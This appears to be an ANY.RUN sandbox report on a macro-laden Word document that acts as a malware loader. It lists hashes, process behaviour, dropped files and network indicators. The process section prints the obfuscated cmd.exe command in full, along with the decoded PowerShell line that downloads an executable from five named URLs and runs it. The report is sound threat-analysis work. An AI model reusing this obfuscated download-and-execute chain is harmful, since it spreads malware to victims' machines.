analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

FA032497_5.doc

Full analysis: https://app.any.run/tasks/d0e7a9a0-c2ae-4e17-a179-c5fdd1c0c41c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 14, 2018, 19:45:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Dec 5 12:59:00 2018, Last Saved Time/Date: Wed Dec 5 12:59:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 12, Security: 0
MD5:

D3F2EC7B0913B0A1BB1E048BF234FEF9

SHA1:

BA58302483F49944C7466D1C8429F5D8890F81E0

SHA256:

6EF58259BA5650C6062A2CDAFF7BFFA66A5F5D66A7EE1E59BE798BA95B6E1507

SSDEEP:

1536:X81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9A0dyCXbhCzbvtzdQNwJw:X8GhDS0o9zTGOZD6EbzCdWQbh8TsaJw

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2964)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2964)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2544)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2352)
    • Application was dropped or rewritten from another process

      • 57.exe (PID: 1952)
      • 57.exe (PID: 2884)
      • archivesymbol.exe (PID: 2304)
      • archivesymbol.exe (PID: 3152)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2352)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4008)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2352)
      • 57.exe (PID: 2884)
    • Creates files in the user directory

      • powershell.exe (PID: 2352)
    • Application launched itself

      • 57.exe (PID: 1952)
    • Starts itself from another location

      • 57.exe (PID: 2884)
    • Connects to unusual port

      • archivesymbol.exe (PID: 3152)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2964)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2964)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 13
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 12
Words: 2
Pages: 1
ModifyDate: 2018:12:05 12:59:00
CreateDate: 2018:12:05 12:59:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
8
Malicious processes
3
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 57.exe no specs 57.exe archivesymbol.exe no specs archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
2964"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA032497_5.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4008c:\DfXDlfvBp\PZfobASRtjzY\wpKRvBBHpsF\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set XZ=mzscYWdnVbtwEsr-0a82\:) 4jNJ1IOx9'/CyU$AhM=Svk5@(g{pRKlZ.;TPGouXLi}F,+7eqfD&&for %P in (38,62,67,11,42,33,9,27,12,33,57,38,64,11,41,42,7,71,11,15,61,9,25,71,3,10,23,26,71,10,56,5,71,9,35,54,65,71,7,10,57,38,37,30,60,42,33,40,10,10,51,21,34,34,49,6,15,3,61,7,13,62,54,10,17,7,10,13,56,3,61,0,34,59,31,7,4,44,27,55,47,40,10,10,51,21,34,34,65,7,13,51,65,14,71,73,65,10,56,7,71,10,34,28,63,29,19,46,31,71,28,53,61,47,40,10,10,51,21,34,34,71,44,17,31,65,7,40,56,71,6,62,56,44,7,34,43,67,60,74,72,54,36,7,37,41,47,40,10,10,51,21,34,34,49,40,17,13,13,17,7,13,62,49,17,14,56,3,61,0,34,63,16,60,55,32,74,24,11,1,47,40,10,10,51,21,34,34,54,65,7,45,19,62,56,7,54,34,54,73,52,7,52,5,6,35,60,41,33,56,43,51,54,65,10,48,33,47,33,22,57,38,40,58,43,42,33,65,11,0,33,57,38,7,27,9,23,42,23,33,46,70,33,57,38,10,35,54,42,33,72,44,35,33,57,38,1,59,65,42,38,71,7,44,21,10,71,0,51,69,33,20,33,69,38,7,27,9,69,33,56,71,31,71,33,57,73,61,14,71,17,3,40,48,38,54,40,35,23,65,7,23,38,37,30,60,22,50,10,14,36,50,38,64,11,41,56,74,61,11,7,54,61,17,6,67,65,54,71,48,38,54,40,35,68,23,38,1,59,65,22,57,38,54,62,55,42,33,65,45,55,33,57,29,73,23,48,48,60,71,10,15,29,10,71,0,23,38,1,59,65,22,56,54,71,7,49,10,40,23,15,49,71,23,18,16,16,16,16,22,23,50,29,7,44,61,45,71,15,29,10,71,0,23,38,1,59,65,57,38,44,64,67,42,33,63,62,53,33,57,9,14,71,17,45,57,66,66,3,17,10,3,40,50,66,66,38,62,58,43,42,33,17,53,39,33,57,79)do set ig=!ig!!XZ:~%P,1!&&if %P geq 79 powershell.exe "!ig:*ig!=!"" c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2544CmD /V/C"set XZ=mzscYWdnVbtwEsr-0a82\:) 4jNJ1IOx9'/CyU$AhM=Svk5@(g{pRKlZ.;TPGouXLi}F,+7eqfD&&for %P in (38,62,67,11,42,33,9,27,12,33,57,38,64,11,41,42,7,71,11,15,61,9,25,71,3,10,23,26,71,10,56,5,71,9,35,54,65,71,7,10,57,38,37,30,60,42,33,40,10,10,51,21,34,34,49,6,15,3,61,7,13,62,54,10,17,7,10,13,56,3,61,0,34,59,31,7,4,44,27,55,47,40,10,10,51,21,34,34,65,7,13,51,65,14,71,73,65,10,56,7,71,10,34,28,63,29,19,46,31,71,28,53,61,47,40,10,10,51,21,34,34,71,44,17,31,65,7,40,56,71,6,62,56,44,7,34,43,67,60,74,72,54,36,7,37,41,47,40,10,10,51,21,34,34,49,40,17,13,13,17,7,13,62,49,17,14,56,3,61,0,34,63,16,60,55,32,74,24,11,1,47,40,10,10,51,21,34,34,54,65,7,45,19,62,56,7,54,34,54,73,52,7,52,5,6,35,60,41,33,56,43,51,54,65,10,48,33,47,33,22,57,38,40,58,43,42,33,65,11,0,33,57,38,7,27,9,23,42,23,33,46,70,33,57,38,10,35,54,42,33,72,44,35,33,57,38,1,59,65,42,38,71,7,44,21,10,71,0,51,69,33,20,33,69,38,7,27,9,69,33,56,71,31,71,33,57,73,61,14,71,17,3,40,48,38,54,40,35,23,65,7,23,38,37,30,60,22,50,10,14,36,50,38,64,11,41,56,74,61,11,7,54,61,17,6,67,65,54,71,48,38,54,40,35,68,23,38,1,59,65,22,57,38,54,62,55,42,33,65,45,55,33,57,29,73,23,48,48,60,71,10,15,29,10,71,0,23,38,1,59,65,22,56,54,71,7,49,10,40,23,15,49,71,23,18,16,16,16,16,22,23,50,29,7,44,61,45,71,15,29,10,71,0,23,38,1,59,65,57,38,44,64,67,42,33,63,62,53,33,57,9,14,71,17,45,57,66,66,3,17,10,3,40,50,66,66,38,62,58,43,42,33,17,53,39,33,57,79)do set ig=!ig!!XZ:~%P,1!&&if %P geq 79 powershell.exe "!ig:*ig!=!""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2352powershell.exe "$uFw='bJE';$LwM=new-object Net.WebClient;$UOG='http://gd-consultants.com/PxnYvJZ@http://inspirefit.net/1XI25xe1Ko@http://evaxinh.edu.vn/SFGDqlynUM@http://ghassansugar.com/X0GZ9D4wz@http://link2u.nl/lfRnRWdCGM'.Split('@');$hTS='iwm';$nJb = '57';$tCl='qvC';$zPi=$env:temp+'\'+$nJb+'.exe';foreach($lhC in $UOG){try{$LwM.DownloadFile($lhC, $zPi);$luZ='ikZ';If ((Get-Item $zPi).length -ge 80000) {Invoke-Item $zPi;$vLF='XuK';break;}}catch{}}$uTS='aKA';"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1952"C:\Users\admin\AppData\Local\Temp\57.exe" C:\Users\admin\AppData\Local\Temp\57.exepowershell.exe
User:
admin
Company:
Microsoft Corporat
Integrity Level:
MEDIUM
Description:
Identi
Exit code:
0
Version:
6.1.7600
2884"C:\Users\admin\AppData\Local\Temp\57.exe"C:\Users\admin\AppData\Local\Temp\57.exe
57.exe
User:
admin
Company:
Microsoft Corporat
Integrity Level:
MEDIUM
Description:
Identi
Exit code:
0
Version:
6.1.7600
2304"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe57.exe
User:
admin
Company:
Microsoft Corporat
Integrity Level:
MEDIUM
Description:
Identi
Exit code:
0
Version:
6.1.7600
3152"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Company:
Microsoft Corporat
Integrity Level:
MEDIUM
Description:
Identi
Version:
6.1.7600
Total events
1 696
Read events
1 283
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRAA7C.tmp.cvr
MD5:
SHA256:
2352powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\70DJL9VQ6DAOKK8NFF1V.temp
MD5:
SHA256:
2352powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b6b1.TMPbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
288457.exeC:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exeexecutable
MD5:D9B1433601F94333212E983F1E65EAFD
SHA256:E3243BDDABCE2F705B1D05231DD5C613A1A5908E488C3EC3E91B44FACF9D66D3
2352powershell.exeC:\Users\admin\AppData\Local\Temp\57.exeexecutable
MD5:D9B1433601F94333212E983F1E65EAFD
SHA256:E3243BDDABCE2F705B1D05231DD5C613A1A5908E488C3EC3E91B44FACF9D66D3
2964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$032497_5.docpgc
MD5:F32BF30F4F3C32E3411AEC27A0E6E745
SHA256:68DD97E1B7C90D0A621CB51D52A13FA11139967058CD6E15DF7F768D4D55F25F
2964WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:4F5F40C47DDD92765B47161B15380CF9
SHA256:3A34E29F643B0F7C1B38279E3FA88B8310EFE43FDAF57CAE22CE4944767D3F29
2352powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2352
powershell.exe
GET
500
184.168.47.225:80
http://inspirefit.net/1XI25xe1Ko
US
malicious
3152
archivesymbol.exe
GET
74.104.175.6:443
http://74.104.175.6:443/
US
malicious
2352
powershell.exe
GET
200
45.252.248.20:80
http://evaxinh.edu.vn/SFGDqlynUM/
VN
executable
520 Kb
malicious
2352
powershell.exe
GET
301
45.252.248.20:80
http://evaxinh.edu.vn/SFGDqlynUM
VN
html
617 b
malicious
2352
powershell.exe
GET
508
160.153.96.128:80
http://gd-consultants.com/PxnYvJZ
US
html
288 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2352
powershell.exe
45.252.248.20:80
evaxinh.edu.vn
AZDIGI Corporation
VN
malicious
2352
powershell.exe
160.153.96.128:80
gd-consultants.com
GoDaddy.com, LLC
US
malicious
2352
powershell.exe
184.168.47.225:80
inspirefit.net
GoDaddy.com, LLC
US
malicious
3152
archivesymbol.exe
74.104.175.6:443
MCI Communications Services, Inc. d/b/a Verizon Business
US
malicious
3152
archivesymbol.exe
142.169.99.1:7080
TELUS Communications Inc.
CA
malicious

DNS requests

Domain
IP
Reputation
gd-consultants.com
  • 160.153.96.128
malicious
inspirefit.net
  • 184.168.47.225
malicious
evaxinh.edu.vn
  • 45.252.248.20
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
2352
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2352
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2352
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2352
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2352
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2352
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2352
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2352
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2352
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info